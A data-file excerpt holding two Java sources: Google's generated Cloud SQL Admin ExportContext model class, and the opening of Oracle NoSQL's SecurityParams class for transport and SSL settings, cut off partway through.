repo_id
stringclasses
875 values
size
int64
974
38.9k
file_path
stringlengths
10
308
content
stringlengths
974
38.9k
googleapis/google-api-java-client-services
35,846
clients/google-api-services-sqladmin/v1beta4/2.0.0/com/google/api/services/sqladmin/model/ExportContext.java
/* * Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except * in compliance with the License. You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software distributed under the License * is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express * or implied. See the License for the specific language governing permissions and limitations under * the License. */ /* * This code was generated by https://github.com/googleapis/google-api-java-client-services/ * Modify at your own risk. */ package com.google.api.services.sqladmin.model; /** * Database instance export context. * * <p> This is the Java data model class that specifies how to parse/serialize into the JSON that is * transmitted over HTTP when working with the Cloud SQL Admin API. For a detailed explanation see: * <a href="https://developers.google.com/api-client-library/java/google-http-java-client/json">https://developers.google.com/api-client-library/java/google-http-java-client/json</a> * </p> * * @author Google, Inc. */ @SuppressWarnings("javadoc") public final class ExportContext extends com.google.api.client.json.GenericJson { /** * Options for exporting BAK files (SQL Server-only) * The value may be {@code null}. */ @com.google.api.client.util.Key private BakExportOptions bakExportOptions; /** * Options for exporting data as CSV. `MySQL` and `PostgreSQL` instances only. * The value may be {@code null}. */ @com.google.api.client.util.Key private CsvExportOptions csvExportOptions; /** * Databases to be exported. `MySQL instances:` If `fileType` is `SQL` and no database is * specified, all databases are exported, except for the `mysql` system database. 
If `fileType` is * `CSV`, you can specify one database, either by using this property or by using the * `csvExportOptions.selectQuery` property, which takes precedence over this property. `PostgreSQL * instances:` If you don't specify a database by name, all user databases in the instance are * exported. This excludes system databases and Cloud SQL databases used to manage internal * operations. Exporting all user databases is only available for directory-formatted parallel * export. If `fileType` is `CSV`, this database must match the one specified in the * `csvExportOptions.selectQuery` property. `SQL Server instances:` You must specify one database * to be exported, and the `fileType` must be `BAK`. * The value may be {@code null}. */ @com.google.api.client.util.Key private java.util.List<java.lang.String> databases; /** * The file type for the specified uri. * The value may be {@code null}. */ @com.google.api.client.util.Key private java.lang.String fileType; /** * This is always `sql#exportContext`. * The value may be {@code null}. */ @com.google.api.client.util.Key private java.lang.String kind; /** * Whether to perform a serverless export. * The value may be {@code null}. */ @com.google.api.client.util.Key private java.lang.Boolean offload; /** * Options for exporting data as SQL statements. * The value may be {@code null}. */ @com.google.api.client.util.Key private SqlExportOptions sqlExportOptions; /** * Optional. Export parameters specific to SQL Server TDE certificates * The value may be {@code null}. */ @com.google.api.client.util.Key private TdeExportOptions tdeExportOptions; /** * The path to the file in Google Cloud Storage where the export will be stored. The URI is in the * form `gs://bucketName/fileName`. If the file already exists, the request succeeds, but the * operation fails. If `fileType` is `SQL` and the filename ends with .gz, the contents are * compressed. * The value may be {@code null}. 
*/ @com.google.api.client.util.Key private java.lang.String uri; /** * Options for exporting BAK files (SQL Server-only) * @return value or {@code null} for none */ public BakExportOptions getBakExportOptions() { return bakExportOptions; } /** * Options for exporting BAK files (SQL Server-only) * @param bakExportOptions bakExportOptions or {@code null} for none */ public ExportContext setBakExportOptions(BakExportOptions bakExportOptions) { this.bakExportOptions = bakExportOptions; return this; } /** * Options for exporting data as CSV. `MySQL` and `PostgreSQL` instances only. * @return value or {@code null} for none */ public CsvExportOptions getCsvExportOptions() { return csvExportOptions; } /** * Options for exporting data as CSV. `MySQL` and `PostgreSQL` instances only. * @param csvExportOptions csvExportOptions or {@code null} for none */ public ExportContext setCsvExportOptions(CsvExportOptions csvExportOptions) { this.csvExportOptions = csvExportOptions; return this; } /** * Databases to be exported. `MySQL instances:` If `fileType` is `SQL` and no database is * specified, all databases are exported, except for the `mysql` system database. If `fileType` is * `CSV`, you can specify one database, either by using this property or by using the * `csvExportOptions.selectQuery` property, which takes precedence over this property. `PostgreSQL * instances:` If you don't specify a database by name, all user databases in the instance are * exported. This excludes system databases and Cloud SQL databases used to manage internal * operations. Exporting all user databases is only available for directory-formatted parallel * export. If `fileType` is `CSV`, this database must match the one specified in the * `csvExportOptions.selectQuery` property. `SQL Server instances:` You must specify one database * to be exported, and the `fileType` must be `BAK`. 
* @return value or {@code null} for none */ public java.util.List<java.lang.String> getDatabases() { return databases; } /** * Databases to be exported. `MySQL instances:` If `fileType` is `SQL` and no database is * specified, all databases are exported, except for the `mysql` system database. If `fileType` is * `CSV`, you can specify one database, either by using this property or by using the * `csvExportOptions.selectQuery` property, which takes precedence over this property. `PostgreSQL * instances:` If you don't specify a database by name, all user databases in the instance are * exported. This excludes system databases and Cloud SQL databases used to manage internal * operations. Exporting all user databases is only available for directory-formatted parallel * export. If `fileType` is `CSV`, this database must match the one specified in the * `csvExportOptions.selectQuery` property. `SQL Server instances:` You must specify one database * to be exported, and the `fileType` must be `BAK`. * @param databases databases or {@code null} for none */ public ExportContext setDatabases(java.util.List<java.lang.String> databases) { this.databases = databases; return this; } /** * The file type for the specified uri. * @return value or {@code null} for none */ public java.lang.String getFileType() { return fileType; } /** * The file type for the specified uri. * @param fileType fileType or {@code null} for none */ public ExportContext setFileType(java.lang.String fileType) { this.fileType = fileType; return this; } /** * This is always `sql#exportContext`. * @return value or {@code null} for none */ public java.lang.String getKind() { return kind; } /** * This is always `sql#exportContext`. * @param kind kind or {@code null} for none */ public ExportContext setKind(java.lang.String kind) { this.kind = kind; return this; } /** * Whether to perform a serverless export. 
* @return value or {@code null} for none */ public java.lang.Boolean getOffload() { return offload; } /** * Whether to perform a serverless export. * @param offload offload or {@code null} for none */ public ExportContext setOffload(java.lang.Boolean offload) { this.offload = offload; return this; } /** * Options for exporting data as SQL statements. * @return value or {@code null} for none */ public SqlExportOptions getSqlExportOptions() { return sqlExportOptions; } /** * Options for exporting data as SQL statements. * @param sqlExportOptions sqlExportOptions or {@code null} for none */ public ExportContext setSqlExportOptions(SqlExportOptions sqlExportOptions) { this.sqlExportOptions = sqlExportOptions; return this; } /** * Optional. Export parameters specific to SQL Server TDE certificates * @return value or {@code null} for none */ public TdeExportOptions getTdeExportOptions() { return tdeExportOptions; } /** * Optional. Export parameters specific to SQL Server TDE certificates * @param tdeExportOptions tdeExportOptions or {@code null} for none */ public ExportContext setTdeExportOptions(TdeExportOptions tdeExportOptions) { this.tdeExportOptions = tdeExportOptions; return this; } /** * The path to the file in Google Cloud Storage where the export will be stored. The URI is in the * form `gs://bucketName/fileName`. If the file already exists, the request succeeds, but the * operation fails. If `fileType` is `SQL` and the filename ends with .gz, the contents are * compressed. * @return value or {@code null} for none */ public java.lang.String getUri() { return uri; } /** * The path to the file in Google Cloud Storage where the export will be stored. The URI is in the * form `gs://bucketName/fileName`. If the file already exists, the request succeeds, but the * operation fails. If `fileType` is `SQL` and the filename ends with .gz, the contents are * compressed. 
* @param uri uri or {@code null} for none */ public ExportContext setUri(java.lang.String uri) { this.uri = uri; return this; } @Override public ExportContext set(String fieldName, Object value) { return (ExportContext) super.set(fieldName, value); } @Override public ExportContext clone() { return (ExportContext) super.clone(); } /** * Options for exporting BAK files (SQL Server-only) */ public static final class BakExportOptions extends com.google.api.client.json.GenericJson { /** * Type of this bak file will be export, FULL or DIFF, SQL Server only * The value may be {@code null}. */ @com.google.api.client.util.Key private java.lang.String bakType; /** * Deprecated: copy_only is deprecated. Use differential_base instead * The value may be {@code null}. */ @com.google.api.client.util.Key private java.lang.Boolean copyOnly; /** * Whether or not the backup can be used as a differential base copy_only backup can not be served * as differential base * The value may be {@code null}. */ @com.google.api.client.util.Key private java.lang.Boolean differentialBase; /** * Optional. The end timestamp when transaction log will be included in the export operation. [RFC * 3339](https://tools.ietf.org/html/rfc3339) format (for example, `2023-10-01T16:19:00.094`) in * UTC. When omitted, all available logs until current time will be included. Only applied to * Cloud SQL for SQL Server. * The value may be {@code null}. */ @com.google.api.client.util.Key private String exportLogEndTime; /** * Optional. The begin timestamp when transaction log will be included in the export operation. * [RFC 3339](https://tools.ietf.org/html/rfc3339) format (for example, `2023-10-01T16:19:00.094`) * in UTC. When omitted, all available logs from the beginning of retention period will be * included. Only applied to Cloud SQL for SQL Server. * The value may be {@code null}. 
*/ @com.google.api.client.util.Key private String exportLogStartTime; /** * Option for specifying how many stripes to use for the export. If blank, and the value of the * striped field is true, the number of stripes is automatically chosen. * The value may be {@code null}. */ @com.google.api.client.util.Key private java.lang.Integer stripeCount; /** * Whether or not the export should be striped. * The value may be {@code null}. */ @com.google.api.client.util.Key private java.lang.Boolean striped; /** * Type of this bak file will be export, FULL or DIFF, SQL Server only * @return value or {@code null} for none */ public java.lang.String getBakType() { return bakType; } /** * Type of this bak file will be export, FULL or DIFF, SQL Server only * @param bakType bakType or {@code null} for none */ public BakExportOptions setBakType(java.lang.String bakType) { this.bakType = bakType; return this; } /** * Deprecated: copy_only is deprecated. Use differential_base instead * @return value or {@code null} for none */ public java.lang.Boolean getCopyOnly() { return copyOnly; } /** * Deprecated: copy_only is deprecated. Use differential_base instead * @param copyOnly copyOnly or {@code null} for none */ public BakExportOptions setCopyOnly(java.lang.Boolean copyOnly) { this.copyOnly = copyOnly; return this; } /** * Whether or not the backup can be used as a differential base copy_only backup can not be served * as differential base * @return value or {@code null} for none */ public java.lang.Boolean getDifferentialBase() { return differentialBase; } /** * Whether or not the backup can be used as a differential base copy_only backup can not be served * as differential base * @param differentialBase differentialBase or {@code null} for none */ public BakExportOptions setDifferentialBase(java.lang.Boolean differentialBase) { this.differentialBase = differentialBase; return this; } /** * Optional. The end timestamp when transaction log will be included in the export operation. 
[RFC * 3339](https://tools.ietf.org/html/rfc3339) format (for example, `2023-10-01T16:19:00.094`) in * UTC. When omitted, all available logs until current time will be included. Only applied to * Cloud SQL for SQL Server. * @return value or {@code null} for none */ public String getExportLogEndTime() { return exportLogEndTime; } /** * Optional. The end timestamp when transaction log will be included in the export operation. [RFC * 3339](https://tools.ietf.org/html/rfc3339) format (for example, `2023-10-01T16:19:00.094`) in * UTC. When omitted, all available logs until current time will be included. Only applied to * Cloud SQL for SQL Server. * @param exportLogEndTime exportLogEndTime or {@code null} for none */ public BakExportOptions setExportLogEndTime(String exportLogEndTime) { this.exportLogEndTime = exportLogEndTime; return this; } /** * Optional. The begin timestamp when transaction log will be included in the export operation. * [RFC 3339](https://tools.ietf.org/html/rfc3339) format (for example, `2023-10-01T16:19:00.094`) * in UTC. When omitted, all available logs from the beginning of retention period will be * included. Only applied to Cloud SQL for SQL Server. * @return value or {@code null} for none */ public String getExportLogStartTime() { return exportLogStartTime; } /** * Optional. The begin timestamp when transaction log will be included in the export operation. * [RFC 3339](https://tools.ietf.org/html/rfc3339) format (for example, `2023-10-01T16:19:00.094`) * in UTC. When omitted, all available logs from the beginning of retention period will be * included. Only applied to Cloud SQL for SQL Server. * @param exportLogStartTime exportLogStartTime or {@code null} for none */ public BakExportOptions setExportLogStartTime(String exportLogStartTime) { this.exportLogStartTime = exportLogStartTime; return this; } /** * Option for specifying how many stripes to use for the export. 
If blank, and the value of the * striped field is true, the number of stripes is automatically chosen. * @return value or {@code null} for none */ public java.lang.Integer getStripeCount() { return stripeCount; } /** * Option for specifying how many stripes to use for the export. If blank, and the value of the * striped field is true, the number of stripes is automatically chosen. * @param stripeCount stripeCount or {@code null} for none */ public BakExportOptions setStripeCount(java.lang.Integer stripeCount) { this.stripeCount = stripeCount; return this; } /** * Whether or not the export should be striped. * @return value or {@code null} for none */ public java.lang.Boolean getStriped() { return striped; } /** * Whether or not the export should be striped. * @param striped striped or {@code null} for none */ public BakExportOptions setStriped(java.lang.Boolean striped) { this.striped = striped; return this; } @Override public BakExportOptions set(String fieldName, Object value) { return (BakExportOptions) super.set(fieldName, value); } @Override public BakExportOptions clone() { return (BakExportOptions) super.clone(); } } /** * Options for exporting data as CSV. `MySQL` and `PostgreSQL` instances only. */ public static final class CsvExportOptions extends com.google.api.client.json.GenericJson { /** * Specifies the character that should appear before a data character that needs to be escaped. * The value may be {@code null}. */ @com.google.api.client.util.Key private java.lang.String escapeCharacter; /** * Specifies the character that separates columns within each row (line) of the file. * The value may be {@code null}. */ @com.google.api.client.util.Key private java.lang.String fieldsTerminatedBy; /** * This is used to separate lines. If a line does not contain all fields, the rest of the columns * are set to their default values. * The value may be {@code null}. 
*/ @com.google.api.client.util.Key private java.lang.String linesTerminatedBy; /** * Specifies the quoting character to be used when a data value is quoted. * The value may be {@code null}. */ @com.google.api.client.util.Key private java.lang.String quoteCharacter; /** * The select query used to extract the data. * The value may be {@code null}. */ @com.google.api.client.util.Key private java.lang.String selectQuery; /** * Specifies the character that should appear before a data character that needs to be escaped. * @return value or {@code null} for none */ public java.lang.String getEscapeCharacter() { return escapeCharacter; } /** * Specifies the character that should appear before a data character that needs to be escaped. * @param escapeCharacter escapeCharacter or {@code null} for none */ public CsvExportOptions setEscapeCharacter(java.lang.String escapeCharacter) { this.escapeCharacter = escapeCharacter; return this; } /** * Specifies the character that separates columns within each row (line) of the file. * @return value or {@code null} for none */ public java.lang.String getFieldsTerminatedBy() { return fieldsTerminatedBy; } /** * Specifies the character that separates columns within each row (line) of the file. * @param fieldsTerminatedBy fieldsTerminatedBy or {@code null} for none */ public CsvExportOptions setFieldsTerminatedBy(java.lang.String fieldsTerminatedBy) { this.fieldsTerminatedBy = fieldsTerminatedBy; return this; } /** * This is used to separate lines. If a line does not contain all fields, the rest of the columns * are set to their default values. * @return value or {@code null} for none */ public java.lang.String getLinesTerminatedBy() { return linesTerminatedBy; } /** * This is used to separate lines. If a line does not contain all fields, the rest of the columns * are set to their default values. 
* @param linesTerminatedBy linesTerminatedBy or {@code null} for none */ public CsvExportOptions setLinesTerminatedBy(java.lang.String linesTerminatedBy) { this.linesTerminatedBy = linesTerminatedBy; return this; } /** * Specifies the quoting character to be used when a data value is quoted. * @return value or {@code null} for none */ public java.lang.String getQuoteCharacter() { return quoteCharacter; } /** * Specifies the quoting character to be used when a data value is quoted. * @param quoteCharacter quoteCharacter or {@code null} for none */ public CsvExportOptions setQuoteCharacter(java.lang.String quoteCharacter) { this.quoteCharacter = quoteCharacter; return this; } /** * The select query used to extract the data. * @return value or {@code null} for none */ public java.lang.String getSelectQuery() { return selectQuery; } /** * The select query used to extract the data. * @param selectQuery selectQuery or {@code null} for none */ public CsvExportOptions setSelectQuery(java.lang.String selectQuery) { this.selectQuery = selectQuery; return this; } @Override public CsvExportOptions set(String fieldName, Object value) { return (CsvExportOptions) super.set(fieldName, value); } @Override public CsvExportOptions clone() { return (CsvExportOptions) super.clone(); } } /** * Options for exporting data as SQL statements. */ public static final class SqlExportOptions extends com.google.api.client.json.GenericJson { /** * Options for exporting from MySQL. * The value may be {@code null}. */ @com.google.api.client.util.Key private MysqlExportOptions mysqlExportOptions; /** * Optional. Whether or not the export should be parallel. * The value may be {@code null}. */ @com.google.api.client.util.Key private java.lang.Boolean parallel; /** * Options for exporting from a Cloud SQL for PostgreSQL instance. * The value may be {@code null}. */ @com.google.api.client.util.Key private PostgresExportOptions postgresExportOptions; /** * Export only schemas. 
* The value may be {@code null}. */ @com.google.api.client.util.Key private java.lang.Boolean schemaOnly; /** * Tables to export, or that were exported, from the specified database. If you specify tables, * specify one and only one database. For PostgreSQL instances, you can specify only one table. * The value may be {@code null}. */ @com.google.api.client.util.Key private java.util.List<java.lang.String> tables; /** * Optional. The number of threads to use for parallel export. * The value may be {@code null}. */ @com.google.api.client.util.Key private java.lang.Integer threads; /** * Options for exporting from MySQL. * @return value or {@code null} for none */ public MysqlExportOptions getMysqlExportOptions() { return mysqlExportOptions; } /** * Options for exporting from MySQL. * @param mysqlExportOptions mysqlExportOptions or {@code null} for none */ public SqlExportOptions setMysqlExportOptions(MysqlExportOptions mysqlExportOptions) { this.mysqlExportOptions = mysqlExportOptions; return this; } /** * Optional. Whether or not the export should be parallel. * @return value or {@code null} for none */ public java.lang.Boolean getParallel() { return parallel; } /** * Optional. Whether or not the export should be parallel. * @param parallel parallel or {@code null} for none */ public SqlExportOptions setParallel(java.lang.Boolean parallel) { this.parallel = parallel; return this; } /** * Options for exporting from a Cloud SQL for PostgreSQL instance. * @return value or {@code null} for none */ public PostgresExportOptions getPostgresExportOptions() { return postgresExportOptions; } /** * Options for exporting from a Cloud SQL for PostgreSQL instance. * @param postgresExportOptions postgresExportOptions or {@code null} for none */ public SqlExportOptions setPostgresExportOptions(PostgresExportOptions postgresExportOptions) { this.postgresExportOptions = postgresExportOptions; return this; } /** * Export only schemas. 
* @return value or {@code null} for none */ public java.lang.Boolean getSchemaOnly() { return schemaOnly; } /** * Export only schemas. * @param schemaOnly schemaOnly or {@code null} for none */ public SqlExportOptions setSchemaOnly(java.lang.Boolean schemaOnly) { this.schemaOnly = schemaOnly; return this; } /** * Tables to export, or that were exported, from the specified database. If you specify tables, * specify one and only one database. For PostgreSQL instances, you can specify only one table. * @return value or {@code null} for none */ public java.util.List<java.lang.String> getTables() { return tables; } /** * Tables to export, or that were exported, from the specified database. If you specify tables, * specify one and only one database. For PostgreSQL instances, you can specify only one table. * @param tables tables or {@code null} for none */ public SqlExportOptions setTables(java.util.List<java.lang.String> tables) { this.tables = tables; return this; } /** * Optional. The number of threads to use for parallel export. * @return value or {@code null} for none */ public java.lang.Integer getThreads() { return threads; } /** * Optional. The number of threads to use for parallel export. * @param threads threads or {@code null} for none */ public SqlExportOptions setThreads(java.lang.Integer threads) { this.threads = threads; return this; } @Override public SqlExportOptions set(String fieldName, Object value) { return (SqlExportOptions) super.set(fieldName, value); } @Override public SqlExportOptions clone() { return (SqlExportOptions) super.clone(); } /** * Options for exporting from MySQL. */ public static final class MysqlExportOptions extends com.google.api.client.json.GenericJson { /** * Option to include SQL statement required to set up replication. If set to `1`, the dump file * includes a CHANGE MASTER TO statement with the binary log coordinates, and --set-gtid-purged is * set to ON. 
If set to `2`, the CHANGE MASTER TO statement is written as a SQL comment and has no * effect. If set to any value other than `1`, --set-gtid-purged is set to OFF. * The value may be {@code null}. */ @com.google.api.client.util.Key private java.lang.Integer masterData; /** * Option to include SQL statement required to set up replication. If set to `1`, the dump file * includes a CHANGE MASTER TO statement with the binary log coordinates, and --set-gtid-purged is * set to ON. If set to `2`, the CHANGE MASTER TO statement is written as a SQL comment and has no * effect. If set to any value other than `1`, --set-gtid-purged is set to OFF. * @return value or {@code null} for none */ public java.lang.Integer getMasterData() { return masterData; } /** * Option to include SQL statement required to set up replication. If set to `1`, the dump file * includes a CHANGE MASTER TO statement with the binary log coordinates, and --set-gtid-purged is * set to ON. If set to `2`, the CHANGE MASTER TO statement is written as a SQL comment and has no * effect. If set to any value other than `1`, --set-gtid-purged is set to OFF. * @param masterData masterData or {@code null} for none */ public MysqlExportOptions setMasterData(java.lang.Integer masterData) { this.masterData = masterData; return this; } @Override public MysqlExportOptions set(String fieldName, Object value) { return (MysqlExportOptions) super.set(fieldName, value); } @Override public MysqlExportOptions clone() { return (MysqlExportOptions) super.clone(); } } /** * Options for exporting from a Cloud SQL for PostgreSQL instance. */ public static final class PostgresExportOptions extends com.google.api.client.json.GenericJson { /** * Optional. Use this option to include DROP SQL statements. Use these statements to delete * database objects before running the import operation. * The value may be {@code null}. */ @com.google.api.client.util.Key private java.lang.Boolean clean; /** * Optional. 
Option to include an IF EXISTS SQL statement with each DROP statement produced by * clean. * The value may be {@code null}. */ @com.google.api.client.util.Key private java.lang.Boolean ifExists; /** * Optional. Use this option to include DROP SQL statements. Use these statements to delete * database objects before running the import operation. * @return value or {@code null} for none */ public java.lang.Boolean getClean() { return clean; } /** * Optional. Use this option to include DROP SQL statements. Use these statements to delete * database objects before running the import operation. * @param clean clean or {@code null} for none */ public PostgresExportOptions setClean(java.lang.Boolean clean) { this.clean = clean; return this; } /** * Optional. Option to include an IF EXISTS SQL statement with each DROP statement produced by * clean. * @return value or {@code null} for none */ public java.lang.Boolean getIfExists() { return ifExists; } /** * Optional. Option to include an IF EXISTS SQL statement with each DROP statement produced by * clean. * @param ifExists ifExists or {@code null} for none */ public PostgresExportOptions setIfExists(java.lang.Boolean ifExists) { this.ifExists = ifExists; return this; } @Override public PostgresExportOptions set(String fieldName, Object value) { return (PostgresExportOptions) super.set(fieldName, value); } @Override public PostgresExportOptions clone() { return (PostgresExportOptions) super.clone(); } } } /** * Optional. Export parameters specific to SQL Server TDE certificates */ public static final class TdeExportOptions extends com.google.api.client.json.GenericJson { /** * Required. Path to the TDE certificate public key in the form gs://bucketName/fileName. The * instance must have write access to the location. Applicable only for SQL Server instances. * The value may be {@code null}. */ @com.google.api.client.util.Key private java.lang.String certificatePath; /** * Required. Certificate name. 
Applicable only for SQL Server instances. * The value may be {@code null}. */ @com.google.api.client.util.Key private java.lang.String name; /** * Required. Password that encrypts the private key. * The value may be {@code null}. */ @com.google.api.client.util.Key private java.lang.String privateKeyPassword; /** * Required. Path to the TDE certificate private key in the form gs://bucketName/fileName. The * instance must have write access to the location. Applicable only for SQL Server instances. * The value may be {@code null}. */ @com.google.api.client.util.Key private java.lang.String privateKeyPath; /** * Required. Path to the TDE certificate public key in the form gs://bucketName/fileName. The * instance must have write access to the location. Applicable only for SQL Server instances. * @return value or {@code null} for none */ public java.lang.String getCertificatePath() { return certificatePath; } /** * Required. Path to the TDE certificate public key in the form gs://bucketName/fileName. The * instance must have write access to the location. Applicable only for SQL Server instances. * @param certificatePath certificatePath or {@code null} for none */ public TdeExportOptions setCertificatePath(java.lang.String certificatePath) { this.certificatePath = certificatePath; return this; } /** * Required. Certificate name. Applicable only for SQL Server instances. * @return value or {@code null} for none */ public java.lang.String getName() { return name; } /** * Required. Certificate name. Applicable only for SQL Server instances. * @param name name or {@code null} for none */ public TdeExportOptions setName(java.lang.String name) { this.name = name; return this; } /** * Required. Password that encrypts the private key. * @return value or {@code null} for none */ public java.lang.String getPrivateKeyPassword() { return privateKeyPassword; } /** * Required. Password that encrypts the private key. 
* @param privateKeyPassword privateKeyPassword or {@code null} for none */ public TdeExportOptions setPrivateKeyPassword(java.lang.String privateKeyPassword) { this.privateKeyPassword = privateKeyPassword; return this; } /** * Required. Path to the TDE certificate private key in the form gs://bucketName/fileName. The * instance must have write access to the location. Applicable only for SQL Server instances. * @return value or {@code null} for none */ public java.lang.String getPrivateKeyPath() { return privateKeyPath; } /** * Required. Path to the TDE certificate private key in the form gs://bucketName/fileName. The * instance must have write access to the location. Applicable only for SQL Server instances. * @param privateKeyPath privateKeyPath or {@code null} for none */ public TdeExportOptions setPrivateKeyPath(java.lang.String privateKeyPath) { this.privateKeyPath = privateKeyPath; return this; } @Override public TdeExportOptions set(String fieldName, Object value) { return (TdeExportOptions) super.set(fieldName, value); } @Override public TdeExportOptions clone() { return (TdeExportOptions) super.clone(); } } }
oracle/nosql
35,875
kvmain/src/main/java/oracle/kv/impl/admin/param/SecurityParams.java
/*-
 * Copyright (C) 2011, 2025 Oracle and/or its affiliates. All rights reserved.
 *
 * This file was distributed by Oracle as part of a version of Oracle NoSQL
 * Database made available at:
 *
 * http://www.oracle.com/technetwork/database/database-technologies/nosqldb/downloads/index.html
 *
 * Please see the LICENSE file included in the top-level directory of the
 * appropriate version of Oracle NoSQL Database for a copy of the license and
 * additional information.
 */

package oracle.kv.impl.admin.param;

import java.io.File;
import java.io.Serializable;
import java.util.Collection;
import java.util.HashMap;
import java.util.Map;
import java.util.Properties;
import java.util.logging.Logger;

import javax.net.ssl.KeyManagerFactory;

import oracle.kv.KVSecurityConstants;
import oracle.kv.impl.param.LoadParameters;
import oracle.kv.impl.param.ParameterMap;
import oracle.kv.impl.param.ParameterState;
import oracle.kv.impl.security.ClearTransport;
import oracle.kv.impl.security.ssl.SSLTransport;
import oracle.kv.impl.util.registry.ClearSocketPolicy;
import oracle.kv.impl.util.registry.ClientSocketFactory;
import oracle.kv.impl.util.registry.RMISocketPolicy;

/**
 * The security configuration properties. Although this class is in the
 * oracle.kv.impl.admin.param package, it isn't actually managed by the admin
 * at this point. It is managed entirely within the filesystem, using
 * the securityconfig utility.
 *
 * <p>The configuration consists of one main parameter map plus one parameter
 * map per named transport ("client", "internal", "ha").  Not thread-safe:
 * callers are expected to configure an instance before sharing it.
 */
public class SecurityParams {

    /** Transport type indicating an explicitly named factory class. */
    public static final String TRANS_TYPE_FACTORY = "factory";

    /** Transport type indicating the built-in SSL transport. */
    public static final String TRANS_TYPE_SSL = "ssl";

    /** Transport type indicating the built-in cleartext transport. */
    public static final String TRANS_TYPE_CLEAR = "clear";

    /**
     * The KeyStore type of a keystore or truststore whose type was not
     * specified explicitly. The JKS value matches the default KeyStore type
     * prior to Java 9.
     */
    public static final String MISSING_KEYSTORE_TYPE = "JKS";

    /* Socket policy used for standard access */
    private RMISocketPolicy clientRMISocketPolicy;

    /* Socket policy used for internally authenticated access */
    private RMISocketPolicy trustedRMISocketPolicy;

    /* The main security parameter map */
    private final ParameterMap map;

    /* Transport-type parameter maps, keyed by transport name */
    private final Map<String, ParameterMap> transportMaps;

    /* The containing directory of this configuration, if known */
    private File configDir;

    /**
     * Basic constructor.  Creates an empty, validating parameter map.
     */
    public SecurityParams() {
        this.map = new ParameterMap();
        this.map.setValidate(true);
        map.setName(ParameterState.SECURITY_PARAMS);
        map.setType(ParameterState.SECURITY_TYPE);
        this.transportMaps = new HashMap<>();
    }

    /**
     * Constructor with explicit parameter setting.
     *
     * @param map the main security parameter map to adopt
     */
    public SecurityParams(ParameterMap map) {
        this.map = map;
        map.setName(ParameterState.SECURITY_PARAMS);
        map.setType(ParameterState.SECURITY_TYPE);
        this.transportMaps = new HashMap<>();
        this.configDir = null;
    }

    /**
     * Constructor for file reading.
     *
     * @param lp the loaded parameters read from the configuration file
     * @param configFile the configuration file; if non-null, its parent
     *        directory is remembered so relative file names can be resolved
     */
    public SecurityParams(LoadParameters lp, File configFile) {
        this.map = lp.getMapByType(ParameterState.SECURITY_TYPE);
        map.setName(ParameterState.SECURITY_PARAMS);
        map.setType(ParameterState.SECURITY_TYPE);

        this.transportMaps = new HashMap<>();
        for (ParameterMap pm :
                 lp.getAllMaps(ParameterState.SECURITY_TRANSPORT_TYPE)) {
            this.transportMaps.put(pm.getName(), pm);
        }

        if (configFile != null) {
            final File absConfigFile = configFile.getAbsoluteFile();
            this.configDir = absConfigFile.getParentFile();
        }
    }

    /**
     * Creates a minimal security parameters object that is sufficient
     * to meet the KVStore server requirements, but represents an insecure
     * environment: security disabled and all transports cleartext.
     */
    public static SecurityParams makeDefault() {
        final SecurityParams sp = new SecurityParams();
        sp.setSecurityEnabled(false);
        sp.addTransportMap("client");
        sp.setTransType("client", TRANS_TYPE_CLEAR);
        sp.addTransportMap("internal");
        sp.setTransType("internal", TRANS_TYPE_CLEAR);
        sp.addTransportMap("ha");
        sp.setTransType("ha", TRANS_TYPE_CLEAR);
        return sp;
    }

    /**
     * Returns an indication of whether this SecurityParams object actually
     * enables security.
     */
    public boolean isSecure() {
        return getSecurityEnabled();
    }

    /** Returns the value of the security-enabled parameter. */
    public boolean getSecurityEnabled() {
        return map.get(ParameterState.SEC_SECURITY_ENABLED).asBoolean();
    }

    /*
     * Create SSL key manager factory using client-server transportation
     * settings. The key manager factory is used for creating SSL context for
     * admin web service.
     */
    public KeyManagerFactory createSSLKeyManagerFactory()
        throws Exception {

        if (!isSecure()) {
            return null;
        }
        final String transportName = "client";
        final ParameterMap transportParams =
            findTransportParams(transportName);
        /*
         * The "client" transport of a secure store is expected to be an
         * SSLTransport; the cast fails otherwise.
         */
        final SSLTransport transport = (SSLTransport) makeTransportFactory(
            transportName, transportParams, RMISocketPolicyBuilder.class);
        return transport.createKeyManagerFactory(this, transportParams);
    }

    /** Sets whether security is enabled. */
    public void setSecurityEnabled(boolean enabled) {
        map.setParameter(ParameterState.SEC_SECURITY_ENABLED,
                         Boolean.toString(enabled));
    }

    /**
     * Set configDir for use when not loaded from file.
     */
    public void setConfigDir(File cfgDir) {
        this.configDir = cfgDir;
    }

    /**
     * Returns the configuration directory containing the security file,
     * or null if not known.
     */
    public File getConfigDir() {
        return configDir;
    }

    /**
     * Accessor for the underlying parameter map.
     */
    public ParameterMap getMap() {
        return map;
    }

    /** Returns the parameter maps for all configured transports. */
    public Collection<ParameterMap> getTransportMaps() {
        return transportMaps.values();
    }

    /**
     * Registers an externally built transport map under the given name,
     * replacing any existing map of that name.
     */
    public void addTransportMap(ParameterMap newMap, String name) {
        newMap.setName(name);
        newMap.setType(ParameterState.SECURITY_TRANSPORT_TYPE);
        transportMaps.put(name, newMap);
    }

    /**
     * Creates and registers an empty, validating transport map for the
     * given name if one does not already exist.
     */
    public void addTransportMap(String name) {
        ParameterMap transportMap = transportMaps.get(name);
        if (transportMap == null) {
            transportMap = new ParameterMap();
            transportMap.setValidate(true);
            transportMap.setName(name);
            transportMap.setType(ParameterState.SECURITY_TRANSPORT_TYPE);
            transportMaps.put(name, transportMap);
        }
    }

    /** Returns the transport map for the given name, or null if absent. */
    public ParameterMap getTransportMap(String name) {
        return transportMaps.get(name);
    }

    /**
     * Whether SSL is disabled on all transports, including transports client,
     * ha and internal.
     * @return true if SSL is disabled on all transports.
     */
    public boolean allTransportSSLDisabled() {
        return !transportSSLEnabled("client") &&
               !transportSSLEnabled("ha") &&
               !transportSSLEnabled("internal");
    }

    /**
     * Whether SSL is enabled on given transport.
     *
     * @param name transport name, valid names: client, ha and internal.
     * @return true if SSL is enabled on given transport, otherwise false
     * if transport isn't enabled SSL or invalid transport is given.
     * @throws IllegalStateException if the named transport does not exist
     */
    public boolean transportSSLEnabled(String name) {
        final String transType = getTransType(name);
        final String transFactory = getTransFactory(name);
        /* SSL either by explicit type or by explicit SSLTransport factory */
        return ((transType != null) && transType.equals(TRANS_TYPE_SSL)) ||
               (transFactory != null) &&
               transFactory.equals(SSLTransport.class.getName());
    }

    /**
